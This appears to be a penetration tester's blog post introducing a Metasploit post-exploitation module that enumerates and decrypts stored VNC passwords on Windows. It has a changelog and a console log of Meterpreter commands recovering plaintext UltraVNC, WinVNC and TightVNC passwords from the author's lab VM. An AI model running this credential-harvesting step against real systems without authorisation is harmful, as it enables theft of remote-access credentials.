Yesterday I saw this ticket: https://www.metasploit.com/redmine/issues/3183 and thought to myself: 'Thats definitely within my coding ability to contribute a patch for'. After almost 15 hours of coding between 9 pm on Saturday and 8 pm on Sunday. It went far and beyond just adding in a bit of code to support UltraVNC.
changelog:
- Complete rewrite as a post module instead of a meterpreter script
- Passwords of less than 8 characters are correctly padded (thanks jduck)
- UltraVNC checks added
- TightVNC checks added for both VNC and it's control console
- Made it very simple to add new checks in either the registry or in a file
- Output is a bit more verbose (lets you know something is happening
- Reports authentication credentials found to database
- Identifies the port that VNC is running on as well
It isn't in the metasploit trunk so until/if if gets added you can get it here:
If you have a check, find it breaks for some reason or another, or just want to tell me that I suck, please leave a comment or email me.
Here it is in action against my VM with 3 different VNC servers on it (calling the post module in two separate ways) :
msf exploit(handler) > sessions -i 1 [*] Starting interaction with 1... meterpreter > getuid Server username: XPBASELINE\Administrator meterpreter > background msf exploit(handler) > use post/windows/gather/enum_vnc_pw msf post(enum_vnc_pw) > set SESSION 1 SESSION => 1 msf post(enum_vnc_pw) > show options Module options (post/windows/gather/enum_vnc_pw): Name Current Setting Required Description ---- --------------- -------- ----------- SESSION 1 yes The session to run this module on. msf post(enum_vnc_pw) > run [*] Enumerating VNC passwords on XPBASELINE [*] Checking UltraVNC... [+] UltraVNC => A85B4C5976979DE93B => thisismy on port: 5900 [+] VIEW ONLY: UltraVNC => DE2C1BA7393F6708B3 => 111 on port: 5900 [*] Checking WinVNC3_HKLM... [*] Checking WinVNC3_HKCU... [*] Checking WinVNC3_HKLM_Default... [*] Checking WinVNC3_HKCU_Default... [*] Checking WinVNC_HKLM_Default... [*] Checking WinVNC_HKCU_Default... [*] Checking WinVNC4_HKLM... [+] WinVNC4_HKLM => c777b2de337a91cf => mypasswo on port: 5900 [*] Checking WinVNC4_HKCU... [*] Checking RealVNC_HKLM... [*] Checking RealVNC_HKCU... [*] Checking TightVNC_HKLM... [+] TightVNC_HKLM => 7ebf1e76f732459f => authpass on port: 5900 [*] Checking TightVNC_HKLM_Control_pass... [+] TightVNC_HKLM_Control_pass => f0299fd0e927cf2f => adminpas on port: 5900 [*] Post module execution completed msf post(enum_vnc_pw) > sessions -i 1 [*] Starting interaction with 1... meterpreter > run post/windows/gather/enum_vnc_pw [*] Enumerating VNC passwords on XPBASELINE [*] Checking UltraVNC... [+] UltraVNC => A85B4C5976979DE93B => thisismy on port: 5900 [+] VIEW ONLY: UltraVNC => DE2C1BA7393F6708B3 => 111 on port: 5900 [*] Checking WinVNC3_HKLM... [*] Checking WinVNC3_HKCU... [*] Checking WinVNC3_HKLM_Default... [*] Checking WinVNC3_HKCU_Default... [*] Checking WinVNC_HKLM_Default... [*] Checking WinVNC_HKCU_Default... [*] Checking WinVNC4_HKLM... [+] WinVNC4_HKLM => c777b2de337a91cf => mypasswo on port: 5900 [*] Checking WinVNC4_HKCU... [*] Checking RealVNC_HKLM... [*] Checking RealVNC_HKCU... [*] Checking TightVNC_HKLM... [+] TightVNC_HKLM => 7ebf1e76f732459f => authpass on port: 5900 [*] Checking TightVNC_HKLM_Control_pass... [+] TightVNC_HKLM_Control_pass => f0299fd0e927cf2f => adminpas on port: 5900 meterpreter >
